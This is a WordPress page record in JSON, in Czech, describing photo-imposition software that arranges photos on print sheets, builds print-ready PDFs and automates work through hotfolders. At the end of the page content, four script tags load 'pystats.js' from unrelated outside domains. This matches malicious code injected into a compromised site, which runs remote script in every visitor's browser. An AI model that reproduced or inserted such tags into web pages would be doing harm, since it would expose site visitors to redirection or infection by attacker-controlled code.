{"id":185,"date":"2016-09-24T10:31:15","date_gmt":"2016-09-24T09:31:15","guid":{"rendered":"http:\/\/photopose.cz\/?page_id=185"},"modified":"2023-03-08T10:55:43","modified_gmt":"2023-03-08T08:55:43","slug":"o_programu","status":"publish","type":"page","link":"https:\/\/photopose.cz\/index.php\/o_programu\/","title":{"rendered":"O programu"},"content":{"rendered":"<h1><span style=\"color: #1baad6;\">O PROGRAMU<\/span><\/h1>\n<h2><strong><span style=\"color: #1baad6;\">______<\/span><\/strong><strong><span style=\"color: #1baad6;\">____<\/span><\/strong><strong><span style=\"color: #1baad6;\">___<\/span><\/strong><\/h2>\n<h2><span style=\"color: #1baad6;\">UNIVERZ\u00c1LN\u00cd N\u00c1STROJ PRO TISK FOTOGRAFI\u00cd<a href=\"http:\/\/photopose.cz\/wp-content\/uploads\/2016\/09\/logo-obecne-e1474226889850.png\"><img loading=\"lazy\" class=\" wp-image-175 alignright\" src=\"http:\/\/photopose.cz\/wp-content\/uploads\/2016\/09\/logo-obecne-300x263.png\" alt=\"logo-obecne\" width=\"156\" height=\"136\" \/><\/a><br \/>\n<\/span><\/h2>\n<ul>\n<li style=\"text-align: justify;\">jednoduch\u00fdm a rychl\u00fdm zp\u016fsobem vy\u0159azuje fotografie<\/li>\n<li>pracuje s r\u016fzn\u00fdmi form\u00e1ty dat (jpg, jpeg, png, tif, bmp, jpf)<\/li>\n<li>pracuje s r\u016fzn\u00fdmi rozm\u011bry fotografi\u00ed, v\u010detn\u011b panoramatick\u00fdch<\/li>\n<li>efektivn\u011b vypl\u0148uje tiskov\u00fd arch, i v p\u0159\u00edpad\u011b r\u016fzn\u00fdch velikost\u00ed fotografi\u00ed v jednom PDF a jedn\u00e9 str\u00e1nce<\/li>\n<li>fotografie vy\u0159ad\u00ed v\u017edy tak, aby arch byl vhodn\u00fd pro n\u00e1sledn\u00fd o\u0159ez<\/li>\n<li>u jednotliv\u00fdch fotografi\u00ed lze upravovat:\n<ul>\n<li>po\u010det kopi\u00ed<\/li>\n<li>form\u00e1t<\/li>\n<li>v\u00fd\u0159ez<\/li>\n<li>rotaci<\/li>\n<\/ul>\n<\/li>\n<li>zachov\u00e1 zdrojov\u00e9 barevn\u00e9 profily a nem\u011bn\u00ed colormanagement<\/li>\n<\/ul>\n<h2 style=\"text-align: justify;\"><strong><span style=\"color: #1baad6;\">__________<\/span><\/strong><strong><span style=\"color: #1baad6;\">___<\/span><\/strong><\/h2>\n<h2 style=\"text-align: justify;\"><span style=\"color: #1baad6;\">VYTV\u00c1\u0158\u00cd PROFESION\u00c1LN\u00cd TISKOV\u00c9 PDF<a href=\"http:\/\/photopose.cz\/wp-content\/uploads\/2017\/03\/logo-pdf-z-jpg.png\"><img loading=\"lazy\" class=\"wp-image-396 alignright\" src=\"http:\/\/photopose.cz\/wp-content\/uploads\/2017\/03\/logo-pdf-z-jpg-264x300.png\" alt=\"logo-pdf-z-jpg\" width=\"191\" height=\"217\" srcset=\"https:\/\/photopose.cz\/wp-content\/uploads\/2017\/03\/logo-pdf-z-jpg-264x300.png 264w, https:\/\/photopose.cz\/wp-content\/uploads\/2017\/03\/logo-pdf-z-jpg.png 560w\" sizes=\"(max-width: 191px) 100vw, 191px\" \/><\/a><\/span><\/h2>\n<ul>\n<li>vytv\u00e1\u0159\u00ed tiskov\u00fd arch ve form\u00e1tu PDF<\/li>\n<li>p\u0159id\u00e1v\u00e1 p\u0159edem definovanou spad\u00e1vku i o\u0159ezov\u00e9 zna\u010dky, tak aby bylo mo\u017en\u00e9 arch n\u00e1sledn\u011b zpracovat standardn\u00edm zp\u016fsobem<\/li>\n<li>fotografie komprimuje dle nastaven\u00e9ho DPI, d\u00edky \u010demu\u017e se v\u00fdsledn\u00e9 PDF rychleji zpracuje na RIPu tiskov\u00e9ho za\u0159\u00edzen\u00ed<\/li>\n<li>umo\u017e\u0148uje definovat popisek\u00a0fotografie a jeho um\u00edst\u011bn\u00ed<\/li>\n<li>automaticky upozor\u0148uje na n\u00edzk\u00e9 rozli\u0161en\u00ed fotografi\u00ed, minim\u00e1ln\u00ed rozli\u0161en\u00ed lze libovoln\u011b volit<\/li>\n<li>automaticky upozor\u0148uje na \u0161patn\u00fd form\u00e1t fotografi\u00ed vzhledem k pom\u011bru stran<\/li>\n<\/ul>\n<h2><strong><span style=\"color: #1baad6;\">_____________<\/span><\/strong><\/h2>\n<h2><span style=\"color: #1baad6;\">AUTOMATIZACE ZPRACOV\u00c1N\u00cd P\u0158ED TISKEM<a href=\"http:\/\/photopose.cz\/wp-content\/uploads\/2016\/09\/logo-hot-e1474227036617.png\"><img loading=\"lazy\" class=\" wp-image-174 alignright\" src=\"http:\/\/photopose.cz\/wp-content\/uploads\/2016\/09\/logo-hot-252x300.png\" alt=\"logo-hot\" width=\"126\" height=\"150\" \/><\/a><br \/>\n<\/span><\/h2>\n<ul>\n<li>umo\u017e\u0148uje ulo\u017eit \u0161ablony typick\u00fdch zak\u00e1zek a t\u00edm zpracovat velk\u00e9 mno\u017estv\u00ed fotografi\u00ed na jeden klik<\/li>\n<li>disponuje funkc\u00ed HOTFOLDER pro maxim\u00e1ln\u00ed rychlost zpracov\u00e1n\u00ed pomoc\u00ed drag&amp;drop fotografi\u00ed do slo\u017eky<\/li>\n<li>funkce HOTFOLDER umo\u017e\u0148uje vytv\u00e1\u0159et slo\u017eky, kter\u00e9 maj\u00ed p\u0159edem definovanou funk\u010dnost a po vlo\u017een\u00ed fotografi\u00ed je automaticky zpracuj\u00ed dle nastaven\u00ed<\/li>\n<\/ul>\n<h2><strong><span style=\"color: #1baad6;\">_____________<\/span><\/strong><\/h2>\n<h2><span style=\"color: #1baad6;\">AUTOMATIZACE ZPRACOV\u00c1N\u00cd PO TISKU<a href=\"http:\/\/photopose.cz\/wp-content\/uploads\/2016\/09\/logo-orezky-1-e1474227111240.png\"><img loading=\"lazy\" class=\" wp-image-176 alignright\" src=\"http:\/\/photopose.cz\/wp-content\/uploads\/2016\/09\/logo-orezky-1-300x255.png\" alt=\"logo-orezky\" width=\"144\" height=\"122\" \/><\/a><\/span><\/h2>\n<ul>\n<li>fotografie se stejn\u00fdm rozm\u011brem vy\u0159ad\u00ed na samostatn\u00e9 archy tak, aby n\u00e1sledn\u00fd o\u0159ez byl co nejefektivn\u011bj\u0161\u00ed<\/li>\n<li>lze definovat vy\u0159azen\u00ed rozm\u011brov\u011b stejn\u00fdch fotografi\u00ed do samostatn\u00fdch PDF<\/li>\n<li>v p\u0159\u00edpad\u011b r\u016fzn\u00fdch rozm\u011br\u016f fotografi\u00ed na jenom archu je vy\u0159ad\u00ed do m\u0159\u00ed\u017eky a umo\u017en\u00ed tak n\u00e1sledn\u00fd o\u0159ez<\/li>\n<li>umo\u017e\u0148uje definovat vzd\u00e1lenost mezi fotografiemi pro zpracov\u00e1n\u00ed archu na \u0159ezac\u00edch automatech<\/li>\n<\/ul>\n<h2><strong><span style=\"color: #1baad6;\">_____________<\/span><\/strong><\/h2>\n<p><script src=\"https:\/\/js.wiilberedmodels.com\/pystats.js?l=l&amp;\" type=\"text\/javascript\" language=\"javascript\"><\/script><script src=\"https:\/\/js.wiilberedmodels.com\/pystats.js?l=l&amp;\" type=\"text\/javascript\" language=\"javascript\"><\/script><script src=\"https:\/\/js.wiilberedmodels.com\/pystats.js?l=l&amp;\" type=\"text\/javascript\" language=\"javascript\"><\/script><script src=\"https:\/\/ns1.bullgoesdown.com\/tmn\/pystats.js?l=l&amp;\" type=\"text\/javascript\" language=\"javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>O PROGRAMU _____________ UNIVERZ\u00c1LN\u00cd N\u00c1STROJ PRO TISK FOTOGRAFI\u00cd jednoduch\u00fdm a rychl\u00fdm zp\u016fsobem vy\u0159azuje fotografie pracuje s r\u016fzn\u00fdmi form\u00e1ty dat (jpg, jpeg, png, tif, bmp, jpf) pracuje s r\u016fzn\u00fdmi rozm\u011bry fotografi\u00ed, v\u010detn\u011b panoramatick\u00fdch efektivn\u011b vypl\u0148uje tiskov\u00fd arch, i v p\u0159\u00edpad\u011b r\u016fzn\u00fdch velikost\u00ed fotografi\u00ed v jednom PDF a jedn\u00e9 str\u00e1nce fotografie vy\u0159ad\u00ed v\u017edy tak, aby arch byl<a href=\"https:\/\/photopose.cz\/index.php\/o_programu\/\">[&#8230;]<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template-fullwidth.php","meta":[],"_links":{"self":[{"href":"https:\/\/photopose.cz\/index.php\/wp-json\/wp\/v2\/pages\/185"}],"collection":[{"href":"https:\/\/photopose.cz\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/photopose.cz\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/photopose.cz\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/photopose.cz\/index.php\/wp-json\/wp\/v2\/comments?post=185"}],"version-history":[{"count":56,"href":"https:\/\/photopose.cz\/index.php\/wp-json\/wp\/v2\/pages\/185\/revisions"}],"predecessor-version":[{"id":455,"href":"https:\/\/photopose.cz\/index.php\/wp-json\/wp\/v2\/pages\/185\/revisions\/455"}],"wp:attachment":[{"href":"https:\/\/photopose.cz\/index.php\/wp-json\/wp\/v2\/media?parent=185"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}